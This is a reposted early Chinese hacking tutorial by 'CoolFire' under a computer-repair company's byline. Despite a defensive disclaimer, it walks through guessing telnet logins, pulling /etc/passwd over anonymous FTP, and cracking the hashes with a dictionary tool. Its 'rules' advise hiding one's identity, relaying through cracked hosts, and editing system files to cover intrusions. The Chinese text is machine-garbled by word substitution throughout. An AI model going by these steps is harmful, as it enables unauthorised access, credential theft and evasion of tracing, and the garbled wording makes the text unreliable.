coolfire黑客入门防范入侵
vCoolHC Volume 1 By CoolFire
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将本身的系统安全
作保护, 要是你能够将这份文件完全看完, 你就能够晓得电脑骇客们是如何入侵你的
电脑, 我是 CoolFire, 写这篇文章的目标是要让大家明确电脑安全的重要性, 并不
是教人 Crack Password 若有人因而文件招致歹意入侵别人的电脑或网路, 本人概不
卖力 !!
#1 甚麽是 Hacking ?
便是入侵电脑! 有甚麽好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件
等都有明白的介绍, 沉迷於电脑的人... 粉碎... 唉! 一大堆怪解释便是了, 最
好不要成为一个 "骇客", 我... 不是!
#2 为甚麽要 Hack ?
我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 尝尝
它的安全性, 然後学著去利用它, 读取系统中有关操纵的说明, 学习它的各项操
作 !! 为了安全性而作革命!
#3 Hack 守则
1. 不歹意粉碎任何的系统, 如许作只会给你带来麻烦.
歹意粉碎它人的软体将招致执法刑责, 要是你只是利用电脑, 那仅为合法使
用!! 注意: 万万不要粉碎别人的软体或材料 !!
2. 不修正任何的系统档, 要是你是为了要进入系统而修正它, 请在答到目标後
将它改回原状.
3. 不要方便的将你要 Hack 的站台告诉你不信托的朋侪.
4. 不要在 bbs 上谈论你 Hack 的任何事变.
5. 在 Post 文章的时候不要利用真名.
6. 正在入侵的时候, 不要随意脱离你的电脑.
7. 不要侵入或粉碎当局构造的主机.
8. 不在德律风中谈论你 Hack 的任何事变.
9. 将你的条记放在安全的地方.
10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统毛病
的文件 (英文快点学好)!
11. 已侵入电脑中的帐号不得扫除或修正.
12. 不得修正系统档案, 要是为了隐藏本身的侵入而作的修正则不在此限, 但仍须
维持原来系统的安全性, 不得因失掉系统的控制权而将流派大开 !!
13. 不将你已破解的帐号分享与你的朋侪.
#4 破解之道
1. 进入主机中
2. 失掉 /etc/passwd
3. 失掉系统帐号
4. 失掉最高权限
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
进入主机有好几种方式, 可以经过 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式进入, 一台主机固然只有一个位址, 但是它大概
同时举行多项服务, 以是要是你只是要 "进入" 该主机, 这些 Port 都是很好的进
行偏向. 固然另有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知
道, 你晓得吗?!
底下的树模并不是像写出来的那麽容易, 只不过是要让你了解如何进入, 固然其
中另有很多问题, 如打错指令...... 等等的毛病... 没有出现在讲堂上, 但是我为了
体面.... 肯定要删掉这些不胜入目标工具嘛...
树模进入主机的方法: (By CoolFire)
(首先要先连上某一台你已经有帐号的 Telnet 主机, 固然最好是假的, 也便是 Crack
过的主机, 然後利用它来 Crack 另外主机, 才不会被别人以逆流法查出你的所在)
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(我用的是 ms.hinet.net ... 固然是假的罗, 都已经颠末修正了啦 !!
没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机称号都是假的名
称, 请同学们要记得 !!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 出去了 ! 开始打击吧 ! 本次的目标是......)
ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 尝尝看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(不要紧, 再来 !!)
cool login: hinet
Password:
Login incorrect
cool login:
(都没猜对, 这边用的是 猜 的方法, 本日运气好像欠好)
telnet> close
Connection closed.
(重来, 换个 Port 尝尝看 !!)
ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
Error 400
Invalid request "" (unknown method)
CERN-HTTPD 3.0A
Connection closed by foreign host.
(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)
(换 FTP Port 尝尝)
ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(哇 ! 可以用 anonymous 出去耶!! password 部份输入 aaa@ 就好了 !
不要留下脚印喔!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(嗯嗯... 太好了 ! 出去了 !! 下一个目标是.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓返来 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 这麽容易吗??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(哇哩... 是 Shadow 的... 真是出师不利.... )
ftp> bye
221 Goodbye.
(不信邪.... 照旧老话, 要有恒心....)
(FTP 不可, 再 Telnet 看看 !!)
ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(又猜错 !!)
cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$
(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连
password 也是 system name.... 总算... 没白玩...)
cool:~$ system
bash: system: command not found
(嗯... 这个 user 的权限好像不大....)
cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(好想睡呀 !! 不玩了 !! 下节课再开始....)
Connection closed.
ms.hinet.net> exit
(走了 !! 下节课在见啦 !! 本日就上到这里 ! 老师要先放工了 !!)
(有门生说: 哄人! 还没有破解呀!! 胡说 ! 不是已经出去了吗 ???
看看这节课上的是甚麽??? ---->进入主机 !! 嗯.....)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.
上节课抓返来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那麽笨吗?? guest 所
抓返来的能是甚麽好工具?? 以是这一节课继续前次的打击行动. 上节课我们已
经 "猜" 到了一个不是 guest 的 username 及 password. 本日就以它来进入主机瞧瞧
!!
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 出去了 ! 开始打击吧 ! 本次的目标是.....呵...)
ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 尝尝看.... 昨天的位址,
有作条记吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password: (一样输入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@
(找寻目标..... 太乱了 ! 懒得找, 再来 ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old
(公然在)
cool:/etc$ more passwd
(看看有没有 Shadow...)
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(误点 ! 一点都没有戒备 !!)
cool:/etc$ exit
logout
(走了!.... 换 FTP 上场 !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit
(闪人罗 !! 下课 !!.... 喔慢点, 另有事要说明......)
passwd 的 Shadow 便是把 passwd 放在 shadow 档中, 而你原先在第一节课
所看到的这个款式的 passwd 并不是真正的 passwd....
root::0:0:root:/root:/bin/bash
因为密码的部份没有工具.... 以是拿了也没有效 !! 但这一节课所拿到的工具呢,
像是如许, 有几点必要说明的, 便是它真相代表著甚麽???
john:234ab56:9999:13:John Smith:/home/john:/bin/sh
它以 ":" 分红几个栏位, 各栏位对照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh
了了吧 ! 了了吧 ! 保存著你历尽艰辛所拿到的 passwd, 我们第三节
课再来告诉列位如何利用 Crack Jack 把 passwd 解码.... 呵呵...
zzZZzZzz...
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Crack Jack V1.4 中文利用说明 (By CoolFire 12-1-1996)
嗯... 该到第三课了 !! 累了的同学先去喝口水吧!
这一节课我们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,
不要告诉我你风俗用
Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4
的度量, 但请
先确定你所利用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到这个版
本的 Crack Jack ! 这才是真正有效的版本, 速度... 对... 便是这点别人都比不上 !
但照旧要讲
讲它的缺点... 便是只能在 DOS 跟 OS2 中跑, 要是在 Windoz 95 上开个 DOS Mode 跑,
它可是连
理都不会理你的 !
OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 利用 Crack Jack 1.4
前所必要的东
西有这些 [1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix
系统中
的 /etc/ 目次中找到 passwd [3] 字典档 (那边找, 本身敲... 呵 ClayMore 中有一份
DIC.TXT
是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听
James
说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 利用 Crack Jack 1.4
前需先确
定你所利用的呆板是 386 含以上 CPU 的 ! 然後最好有富足的影象体 !!
开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名,
Dictionary
Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT
中写入它所
找到的密码 !! 但... 有点怪的款式! 要是找到的是具 root 权限的密码, Jack 会告诉你
This is
JackAss... 嗯...说脏话了 !! 因为利用 Jack 占用的工夫着实太多,
要是你中途想要停掉时只要
按下 Ctrl-C 即可, 别以为你半途而废了! 因为 Jack 有个 Restore 的功效,
中断时会自动存档
为 RESTORE, 下次要继续这次的探求只要输入 Jack -Restore:RESTORE 即可 !!
固然你也可以为
你的 Restore 重新定名 ! Jack 也会找失掉的 ... 如 Ren restore restore.HNT
之後要再探求
的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore
前次所探求的字串...
继续帮你找下去....
字典档那边找: 我的不给你! 可以找另外 Brute Force 之类的程式, 有些里面会附,
或是找找别的
的 Hacker 地下站看看有没有, 本身编一个, 或找个英汉字典软体将字典的部份解出来,
大概要有
一点材料栏位及写程式的底子.
[这一节课没有典范] 乐成的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack
好误点呀 !!!
所花的工夫: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧
!!
------
最近比力没空了 ! 因为要赶别的的报告, Home Page 也没有太多工夫整理,
更别说是写这些说明白,
但是太多网友必要, 我只好两肋插刀... 差点昨天就交不出报告了 !!
要是你有兴趣写别的程式的中
文说明, 请完成後寄一份给我, 我将它放在 Home Page 上面让别的人参考,
固然你也可以给我你的
利用心得, 让别人参考看看也行! 另外 CoolFire 现在预备网络一系列的 System Hole
List, 要是
你在别的的站台有看到的, 请把它先 Cut 下来, Mail 一份给我 !
如许我才能弄出一份更齐全的东
西呀.... 另有... 在想弄个 Mail List... 唉.. 不想这麽多了! 有空再说吧!
------
再次重申, Crack 别人站台之後不要粉碎别人站台中的材料, 此篇文章仅作为教诲目标,
不主张你随
便入侵别人主机.... (固然 高-Net 除外, 我恨去世它了)... 请勿将这类技术利用於粉碎上
(又.....
要是第三次天下大战开打, 你可以恣意粉碎敌国的电脑网路... 我全力支持),
最严重的情况(要是你
真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:系统,安全,入侵
评论加载中...
|